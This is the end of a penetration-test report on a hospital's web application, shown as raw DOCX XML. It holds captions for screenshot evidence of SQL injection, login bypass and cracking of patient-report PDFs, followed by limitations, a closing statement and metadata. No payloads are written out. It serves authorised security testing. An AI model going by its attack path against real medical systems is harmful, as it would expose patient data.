        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>12 Error Log Metadata — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28759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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2875915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>13 Patient Login Form — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="76212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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7621270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>14 Patient Report 1 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="20110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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2011045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>15 Patient Report 1 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="77590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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7759065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>16 Patient Report 2 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="2185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38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2185670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>17 Patient Report 2 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="76555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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7655560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>18 Patient Report 3 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="10458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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1045845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>19 Patient Report 3 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28848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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2884805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>20 Patient Reports Listing — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="2552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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>21 PDF Crack Execution — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28733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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2873375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>22 SQLi Application Evidence — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="50939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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="5093970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>23 SQLmap Validation — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28873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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2887345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>24 Staff Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28987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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2898775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>25 Staff Login — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>33. Limitations &amp; Evidence Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The exact server-side source code was not available; root causes are therefore stated at the level supported by black-box behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>sqlmap did not independently confirm the SQL injection because of repeated HTTP 403 responses and connection instability. Manual differential testing and Burp/browser evidence are the primary proof.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A standalone cross-patient IDOR was not claimed because the test did not establish that a legitimately authenticated patient could access another patient record without the authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The contents of the exposed error_log were not claimed as readable; only its filename and metadata were observed in the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Auxiliary mail/FTP/DNS/cPanel services were enumerated but not independently exploited because the authorized scope was the target domain and no destructive or out-of-scope testing was performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No crack runtimes are reported because reliable timing evidence was not captured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>34. Final Analyst Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evidence supports a practical compromise path from an unauthenticated external position to sensitive patient and corporate information. The strongest findings are independently reproducible and do not depend on speculative source-code claims. The most important remediation objective is to restore trust boundaries at the application, file-system and deployment layers simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This report is intentionally structured as a standalone security engineering case study. It demonstrates reconnaissance, manual exploitation, evidence preservation, cryptographic analysis, sensitive-data quantification, remediation engineering, detection design and retest planning. Those elements make the project suitable for a professional portfolio when accompanied by a sanitized public version that excludes credentials and personal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Prepared by Chandrashekar Bala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId47"/>
      <w:headerReference w:type="default" r:id="rId48"/>
      <w:headerReference w:type="first" r:id="rId49"/>
      <w:footerReference w:type="even" r:id="rId50"/>
      <w:footerReference w:type="default" r:id="rId51"/>
      <w:footerReference w:type="first" r:id="rId52"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:left="1008" w:right="1008"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CONFIDENTIAL — INDEPENDENT SECURITY ASSESSMENT — CHANDRASHEKAR BALA  |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CONFIDENTIAL — INDEPENDENT SECURITY ASSESSMENT — CHANDRASHEKAR BALA  |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46464"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>MEDIROZA  |  INDEPENDENT SECURITY ASSESSMENT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46464"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>MEDIROZA  |  INDEPENDENT SECURITY ASSESSMENT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100"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ ゴシック" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>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ＭＳ ゴシック" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5597"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00fc693f"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ ゴシック" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="44546A"/>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100"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ ゴシック" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="17365D"/>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edirozahospital.com/sitemap.xml"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14.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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8.png"/><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13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.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Relationship Id="rId5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Application>LibreOffice/25.8.7.3$Windows_X86_64 LibreOffice_project/30742500f2d3eb4366ac312fa33d3dcabdb3eba5</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>53</Pages>
  <Words>9548</Words>
  <Characters>62209</Characters>
  <CharactersWithSpaces>70131</CharactersWithSpaces>
  <Paragraphs>1615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Chandrashekar Bala</dc:creator>
  <dc:description>Confidential professional security assessment.</dc:description>
  <cp:keywords>penetration testing web application security SQL injection authentication bypass evidence engineering remediation</cp:keywords>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2026-10-02T01:58:22Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-02T02:59:09Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject>End-to-end authorized web application penetration testing and security assessment</dc:subject>
  <dc:title>Independent Web Application Security Assessment — Mediroza General Hospital</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>